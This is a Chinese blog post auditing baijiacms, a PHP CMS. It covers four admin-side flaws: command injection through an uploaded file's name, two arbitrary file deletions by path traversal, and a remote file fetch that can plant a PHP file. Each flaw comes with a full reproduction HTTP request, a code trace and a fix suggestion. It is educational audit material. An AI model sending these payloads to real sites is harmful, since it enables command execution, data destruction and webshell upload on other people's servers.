6、baijiacms代码审计

最新推荐文章于 2024-04-23 10:03:35 发布
最新推荐文章于 2024-04-23 10:03:35 发布
阅读量375 收藏 12
点赞数 9
分类专栏: php代码审计(二) 文章标签: php 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YINZHE_/article/details/136462785
版权
文章详细描述了网站后台存在的多个安全漏洞,包括命令执行漏洞、文件上传和删除的任意性,强调了使用安全函数、验证用户输入和限制文件权限的重要性。
摘要由CSDN通过智能技术生成

1、后台存在1处命令执行

漏洞条件:

参数接收后执行eval('$data='这里面的输入的内容'')
点是连接符,//注释掉后面的
● 漏洞url: http://baijiaccc.com/index.php?mod=site&act=weixin&do=setting
● 漏洞参数:sqlstr
● 是否存在限制: 1、满足$extention=txt(获取文件类型是否为txt)
2、满足有提交事件(一定会满足)
3、上传文件的值不为空(搜索关键字在前端文件显示授权文件)
4、判断$srttings有值(image_compress_openscale开启)
● 是否还有其他条件:mod=site&act=weixin&do=setting

复现

POST /index.php?mod=site&act=weixin&do=setting HTTP/1.1
Host: baijiaccc.com
Content-Length: 1224
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://baijiaccc.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBY6mmvFXLNBb313
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://baijiaccc.com/index.php?mod=site&act=weixin&do=setting
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sa0o3fgd3il0kc7gmg3e9uq666
Connection: close

------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixinname"

111
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="interface"

http://baijiaccc.com/api.php?op=weixin
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixintoken"

13u5hio3u3abkg3kcpj35arlblymbnim
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="EncodingAESKey"

PLAhEBiKscPIwh9C6KnzEPVtb0qPBkxJZ8v99KfHCY1
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixin_appId"

aaa
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixin_appSecret"

ssss
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixin_verify_file"; filename="&calc&.txt"
Content-Type: text/plain


------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixin_noaccess"

0
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="weixin_shareaddress"

0
------WebKitFormBoundaryFBY6mmvFXLNBb313
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryFBY6mmvFXLNBb313--


抓到上传问及教案的包,把文件名改成执行的命令

在这里插入图片描述

代码

搜索命令执行的关键字带变量

在这里插入图片描述

第一个变量被强制类型转换,跟踪下file_save函数,传什么值就是什么,如果是变量就可控制

在这里插入图片描述

 第四个变量$file[name]从上面的$_FILES传过来。
大概思路:system-->$file_full_path-->file_save-->$file['name']-->$file=$_FILES['weixin_verify_file']

在这里插入图片描述

先访问网站复制地址,找到对应代码文件,再去分析漏洞文件对应的功能位置
system/manager/class/web/store.php
baijiaccc.com/index.php?mod=site&act=manager&do=store&op=display&beid=1
漏洞文件地址:
system/weixin/class/web/setting.php
baijiaccc.com/index.php?mod=site&act=weixin&do=setting
刚好有文件上传的功能

在这里插入图片描述

触发这个函数要满足的条件:
1、满足$extention=txt(获取文件类型是否为txt)
2、满足有提交事件(一定会满足)
3、上传文件的值不为空(搜索关键字在前端文件显示授权文件)
4、判断$srttings有值(image_compress_openscale开启)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

修复建议

坚持在调用系统命令时使用安全的函数库,验证并清理所有用户输入,以避免可能的命令注入攻击。

2、后台存在1处任意文件删除

漏洞条件:

● 漏洞url: http://baijiaccc.com/index.php?mod=site&act=manager&do=database&op=delete&id=Li4vLi4vLi4vMw%3d%3d&beid=1
● 漏洞参数:id
● 是否存在限制: id需要base64编码
● 是否还有其他条件:mod=site&act=manager&do=database&op=delete&id=&beid=1

复现

GET /index.php?mod=site&act=manager&do=database&op=delete&id=Li4vLi4vLi4vMw%3d%3d&beid=1 HTTP/1.1
Host: baijiaccc.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://baijiaccc.com/index.php?mod=site&act=manager&do=database&op=restore&ischeck=1&beid=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=sa0o3fgd3il0kc7gmg3e9uq666
Connection: close

在这里插入图片描述
在这里插入图片描述

代码

搜索删除函数unlink()并且存在可控变量,rmdirs函数也是删除函数

在这里插入图片描述

跟踪$path变量,判断这个下边是不是文件目录,并遍历这个列表。对于每个文件或子目录,如果它的名称既不是点 '.' (表示当前目录)也不是点点 '..' (表示父目录),并且名称不是 'qrcode',它就会被删除。
在删除所有文件和子目录之后,如果 $path 不是 WEB_ROOT 下的 '/cache/' 目录,那么这个目录也会被尝试删除。

在这里插入图片描述

跟踪rmdirs函数,查看它被谁调用。
条件:
1、op=delete
2、$d = base64_decode($_GP['id']);
没有额外的过滤

在这里插入图片描述

修复建议

需要验证用户输入,限制文件访问权限,并且仅允许经过身份验证和授权的用户操作文件。

3、后台存在1处任意文件上传

漏洞条件:

● 漏洞url: http://baijiaccc.com/index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=
● 漏洞参数:url
● 是否存在限制: 
● 是否还有其他条件:mod=site&do=file&act=public&op=fetch&beid=1&url=

复现

GET /index.php?mod=site&do=file&act=public&op=fetch&beid=1&url=http://远程地址/文件.php HTTP/1.1
Host: baijiaccc.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=pusi68o14jke80q64hcg8ram20; __fileupload_type=image; __fileupload_dest_dir=; __fileupload_global=
Connection: close




在虚拟机创建个php文件

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

代码

获取 $_GPC['url'] 的值,去掉两边的空格,并将结果赋值给 $url;然后调用 fetch_net_file_upload($url) 函数,将结果赋值给 $file。如果存在错误就提示输出

在这里插入图片描述

跟踪fetch_net_file_upload函数,先对Url去除两边的空。
判断目录是否存在不存在则创建

在这里插入图片描述

SSRF涉及到的危险函数主要是网络访问,支持伪协议的网络读取。以PHP为例,涉及到的函数有 file_get_contents() / fsockopen() / curl_exec() 等。
file_get_contents会读取获取的url传入的内容

在这里插入图片描述

修复建议

应限制出站请求的目标和类型,使用安全的编程实践,以及对用户提供的数据进行有效的输入验证和清理。

4、任意文件删除

漏洞条件

● 漏洞url: http://baijiaccc.com/index.php?mod=mobile&act=uploader&op=remove&do=util&m=eshop&file=../2.txt
● 漏洞参数:file
● 是否存在限制: system_isnetattach为空;op=remove
● 是否还有其他条件:mod=mobile&act=uploader&op=remove&do=util&m=eshop&file=

复现

POST /index.php?mod=mobile&act=uploader&op=remove&do=util&m=eshop&file=../2.txt HTTP/1.1
Host: baijiaccc.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://baijiaccc.com/index.php?mod=site&act=manager&do=store&op=display&beid=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=1oqv3hhn86om48bmgckd0b2fe6
Connection: close



在/attachment/上级目录创建2.txt

在这里插入图片描述

代码

unlink函数出现且有可控变量
$file_relative_path跟踪,698行先判断这个变量为空返回true,否则继续执行,unlink函数在else里面,所以让if条件不成立就可以。system_isnetattach让他为空

在这里插入图片描述

在跟踪file_delete谁调用了这个方法。uploader.php文件
op=remove,接收file参数

在这里插入图片描述

修复建议

需要验证用户输入,限制文件访问权限,并且仅允许经过身份验证和授权的用户操作文件。
YINZHE_
关注
  • 9
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wuzhicms代码审计
hackzkaq的博客
07-04 584
环境搭建 源码下载官网:https://www.wuzhicms.com/放到本地phpstudy根目录下,访问install路径进行安装。访问后台:访问前台:直接后台挂个链接:漏洞分析 搜索select的时候 发现在mysql.class文件下有一个函数里面有select 并且后面的拼接也没有任何的过滤搜索哪里调用了这个函数,先是在api目录下的sms_check文件中发现调用了get_one函数 并且参数是通过前面的$code拼接。我们可以看到code 先是通过$GLOBALS来获取参数param的值
Java代码审计之ofcms
Java_ttcd的博客
08-12 319
还有一个freemarker模板注入漏洞,因为我自己也没整明白,也就没办法分析了。等以后审计能力够了会再写。还有一个问题,关于上传jsp文件为什么执行不了——是因为存在jfinal过滤器,所以没有办法传上去。运行后,输入自己的数据库信息。这里根据控制器,看每一个接口走下来,最终也是审出来了。...
BaiJiaCms 漏洞挖掘
huohaowen的博客
01-20 573
今天来和大家讲一下baijiacms的漏洞挖掘,小编一般都是黑盒测试,没有对其代码审计,(等小编把常见的漏洞都了解一下在进行代码审计
baijiacms--php代码审计
weixin_50217210的博客
03-09 1774
baijiacms代码审计 php,主要是思路
代码审计之旅之百家CMS
A_991128a的博客
09-13 110
之前审计的CMS大多是利用工具,即Seay+昆仑镜联动扫描出漏洞点,而后进行审计。感觉自己的能力仍与零无异,因此本次审计CMS绝大多数使用手动探测,即通过搜索危险函数的方式进行漏洞寻找,以此来提升审计能力,希望对正在学习代码审计的师傅能有所帮助。
探索 BaiJiaCMS V2:一个强大且灵活的内容管理系统
最新发布
gitblog_00059的博客
04-23 367
探索 BaiJiaCMS V2:一个强大且灵活的内容管理系统 项目地址:https://gitcode.com/baijiacms/baijiacmsV2 BaiJiaCMS V2 是一款开源的、基于 PHP 的内容管理系统,专为快速构建和管理网站而设计。它结合了现代Web开发的最佳实践,提供了丰富的功能集,旨在让开发者和非开发者都能轻松地创建、编辑和发布内容。 技术分析 基础架构 BaiJiaC...
代码审计之百家cms
qq_44029310的博客
07-25 1305
本文包括环境搭建,xdebug调试配置,以及六个漏洞的复现和分析加调试。
一款自己弄的一个网站源码 baijiacms_v2.0.rar
07-23
【标题】"baijiacms_v2.0.rar" 是一个网站源码的压缩包,意味着它包含了构建一个完整网站所需的全部代码文件。这个源码可能是由开发者个人创建的,或者是在现有开源CMS(内容管理系统)基础上进行定制或修改后的版本...
电商微商模板(PHP
11-23
压缩包内的"baijiacms"可能是该系统的名称,通常包括了所有必要的源代码文件、配置文件、数据库脚本、静态资源(如CSS、JavaScript和图片)以及可能的文档和示例数据。开发者需要有一定的PHP和Web开发经验,以便理解...
百家CMS,免费多站点微商城,支持微信支付、支付宝
07-23
百家CMS微商城是一款免费开源的面向对象的多店铺多用户微商城PHP开发框架,创建于2014年6月,遵循Apache Licence2开源协议发布,是为了快速简化企业微商城应用开发、帮助微商企业快速赚钱而诞生的。 ...
百家cms V4.1.4源码下载
01-06
一款完善的php分销商城,可运营,我推荐了几个客户在用,安装后即可开始使用。 在addons文件夹里是一个插件范例,可以自定开发扩展插件。内含三级分销,可对接微信,支持支付宝支付的全网分销插件,结构简单,只要会php就懂得二次开发。
百家CMS手机支付宝+PC支付宝+微信扫码+微信公众号免签支付插件。
01-09
百家CMS手机支付宝+PC支付宝+微信扫码+微信公众号免签支付插件。内附详细安装教程
百家CMS微商城V2.3—UTF8 稳定版下载
10-19
百家CMS微商城从诞生开始,就坚持着简单实用的原则,基于目前最流行的WEB2.0的架构(php+mysql),拥有成熟、稳定的微电商技术解决方案。基于完整的会员等级制度,完善的微商城购物流程,订单管理、优惠券、搜索、购物车等功能。采用跨平台机制,可同时对接微信公众号平台和支付宝服务窗,兼容微博、手机QQ等平台;丰富的支付方式、支持微信支付、支付宝支付、货到付款、余额支付、网银支付等。并且拥有完整的用户权限设置,丰富的开源扩展插件、签到、秒杀、团购、推荐有礼、积分商城、会员卡、数据报表等,满足微商的不同运营的需求,也方便企业二次开发。 百家CMS微商城框架源码透明、开放,一切的数据及资源都架设在自己的服务上,保证独立性、安全性及可控性。灵活简单的模板机制,让模板设计更简单。详细的二次开发帮助文档,丰富的二次开发功能插件源代码供下载,方便进行二次开发。
百家CMS开源商城
06-30
产品介绍: ************************************************************ 1、百家CMS微商城是一款免费开源的单店铺多用户的微商城管理系统,以最低的成本帮助微商快速搭建自己的微商城; 2、百家CMS微商城是基于目前最流行的WEB2.0的架构(php+mysql),拥有成熟、稳定的微电商技术解决方案。 3、系统源码透明、开放,一切的数据及资源都架设在自己的服务上,保证独立性、安全性及可控性。 4、跨平台功能,兼容微信、微博、手机QQ等平台,只要有浏览器就能访问,支持微信、QQ、微博等快捷登录。 5、丰富的可选扩展功能插件,签到、秒杀、团购、推荐有礼、积分商城、会员卡、数据报表等,满足微商的不同运营的需求。 6、灵活的模板机制,基于流行的smarty模板模板引擎,让模板设计更简单。 7、代码完全开源,方便商家进行二次开发。 8、 完整的购物功能,系统具备完整的商品管理、订单管理、购物车、搜索引擎、会员中心、下单流程等,提供了完整的微商城功能。 9、丰富的支付方式、支持微信支付、支付宝支付、货到付款、余额支付、网银支付等(部分支付功能需要授权后使用)。 10、完整的用户权限设置。 11、云服务功能,方便后台在线升级,保障系统的稳定和新功能的使用。
php代码审计学习-baijiacms v4
qq_42077227的博客
06-05 1220
baijiacms v4 代码审计学习-system任意命令执行
PHP代码审计--百家CMS4.1.4项目实战(上)
HEAVEN569的博客
06-24 3367
这是关于百家cms的渗透测试+代码审计
百家CMS代码审计
qq_42383069的博客
10-16 2729
3. 审计此时代码,发现后台接收前端传递的参数id,这里id外部可控,另外发现这里引用了rmdirs()函数,最后这里对删除的文件是否为文件夹做了一个判断,若是文件夹,则OK,若单纯的文件,则无法删除。4. 查看引用的rmdirs()函数,发现使用了删除函数rmdir(),所以这里我们可以手动构造其他文件来删除。语法: updatexml(XML_document,XPath_string,new_value)5. 可以看到,程序直接输出,无任何过滤,所以存在XSS漏洞。可以看到这里主要传递了前端输入的。
百家cms v4.1.4漏洞
chaojixiaojingang
09-29 1513
一、任意文件删除漏洞 PS: 1)不需要后台权限; 2)只能删除文件,不能删除文件夹。 漏洞复现: (1)在网站根目录下创建test.txt (2)访问payload: http://127.0.0.1/baijiacms/index.php?mod=mobile&act=uploader&op=post&do=util&m=eshop&op=remove&file=../test.txt (3)查看根目录,test.txt文件已经被删
百家CMS v4.1.4代码审计
D.MIND 的博客
08-19 948
中午在先知上看到篇百家cms的代码审计,不是很难,适合我这种菜???? 参考:https://xz.aliyun.com/t/9955#toc-0 源码下载:https://gitee.com/openbaijia/baijiacms.git 文章目录任意目录删除利用远程文件上传利用命令执行利用总结 任意目录删除 漏洞点位于:includes/baijiacms/common.inc.php 首先关注的是unlink函数,他会删除文件,只要$path不是目录就会进入改分支。 但如果你是目录呢,会对目录中非.
了解百家CMS——百家CMS微商城说明文档(1)
红星的专栏
05-13 1551
了解百家CMS 了解百家CMS微商城 产品介绍: 百家CMS微商城是一款免费开源的面向对象的单店铺多用户微商城PHP开发框架,创建于2014年6月,遵循Apache Licence2开源协议发布,是为了快速简化企业微商城应用开发、帮助微商企业快速赚钱而诞生的。 百家CMS微商城从诞生开始,就坚持着简单实用的原则,基于目前最流行的WEB2.0的架构(php+mysql),拥有成熟、稳定的微电商技术解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值